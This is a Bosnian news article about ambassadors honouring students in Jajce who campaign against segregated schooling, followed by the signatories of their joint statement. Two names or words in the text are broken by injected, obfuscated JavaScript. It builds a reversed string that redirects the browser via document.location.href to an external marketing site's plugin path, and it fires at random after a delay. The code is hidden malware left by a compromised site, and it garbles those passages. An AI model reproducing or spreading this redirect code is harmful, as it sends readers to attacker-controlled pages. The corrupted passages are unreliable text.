Hrabroj djeci iz Jajca uručeno priznanje iz cijele Evrope

Bravo djeco!

Grupa frankofonih ambasadora u Bosni i Hercegovini posjetila je danas Jajce kako bi uručili javno priznanje “Most za budućnost – Le pont pour l’avenir” neformalnoj grupi učenika Srednje strukovne škole Jajce (SSŠ Jajce) i Srednje škole „Nikola Šop“ Jajce (SŠ „Nikola Šop“ Jajce) koji svojim zalaganjem doprinose izgradnji mostova i povezivanju naroda u Bosni i Hercegovini.

Ovo je simbolična gesta podrške borbi učenika za jedinstveni nastavni plan i program u školama, uz poštovanje multietničnosti Jajca i Srednjebosanskog kantona.

Dodjeli priznanja prisustvovali su ambasadori Švajcarske, Njemačke, Japana, Rumunije, šefovi misija OSCE-a i Vijeća Evrope, predstavnici ambasade Francuske i Delegacije Evropske unije u BiH (lista će se širiti), kao i predstavnici neformalne grupe profesorica/a „Bolja škola“ iz Jajca.

Tokom cijele protekle godine srednjoškolci su demonstrirali moralnu i građansku hrabrost u njihovim javnim nastojanjima da zaustave odvajanje i nacionalizam u obrazovnom sektoru u Jajcu i Srednjebosanskom kantonu. Njihova borba za inkluzivno i kvalitetno obrazovanje, multikulturno društvo bez podjela i duh zajedništva su hvale vrijedni. Svojim zalaganjem nose poruku da mladi ljudi doprinose izgradnji mostova širom zemlje i da se njihov glas treba čuti.

Prepoznajući snažnu želju i spremnost da se bore za ove vrijednosti i principe, grupa frankofonih ambasadora uz podršku drugih ambasadora/predstavnika međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodne zajednice u BiH jednoglasno je odlučila da uruči specijalno priznanje “Most za budućnost – Le pont pour l’avenir” neformalnoj grupi srednjoškolaca iz Jajca. Ovo je simbolična gesta podrške borbi učenika za jedinstveni nastavni plan i program u školama, uz poštovanje multietničnosti Jajca i Srednjebosanskog kantona.

„Prema mladima se treba odnositi s poštovanjem i kao prema produktivnim članovima društva. Bitno je njihovo nastojanje da ostanu zajedno shvatiti ozbiljno i ispoštovati ga. Uvjereni smo da poduhvati učenika iz Jajca mogu koristiti za primjer drugim građanima ove države. Od političara i lidera očekujemo da ispune svoju obavezu da mladima ponude kvalitetno obrazovanje koje će ih pripremiti za budućnost, a ono podrazumijeva i naučiti ih da žive skupa. Velika je čast ovo posebno priznanje dodijeliti učenicima koji se bore za bolje prilike i perspektive za sadašnju generaciju, ali i koji grade mostove za bolju budućnost Bosne i Hercegovine“, stoji u zajedničkoj izjavi ambasadora koja je ovom prilikom predstavljena javnosti.

Potpisnici zajedničke izjave su :

apostolski nuncij Luigi Pezzuto;
ambasador Austrije Martin Pammer;
šef diplomatskog ureda Belgije Joris Ronse;
ambasadorica Bugarske Avgustina K. Tzvetkova;
ambasador Lars-Gunnar Wigemark, šef Delegacije EU/specijalni predstavnik EU;
otpravnica poslova pri ambasadi Francuske Catherine Veber;
ambasador Grčke Georgios Iliopoulos;
ambasador Holtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andije Juriaan Kraak;
ambasador Italije Nicola Minasi;
ambasador Japana Kazuya Ogawa;
ambasador Suverenog malteškog vojnog reda Charles-Henry de Rambures;
ambasadorica Njemačke Christiane Hohmann;
ambasador Jonathan Moore, Misija OSCE-a;
ambasadorica Rumunije Dana Constantinescu;
ambasadorica Sjedinjenih američkih država Maureen Cormack;
ambasador Španije Bosco Gimenez Soriano;
ambasadorica Švajcarske Andrea Rauber Saxer;
ambasador Drahoslav Stefanek, Vijeće Evrope.

Buka

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login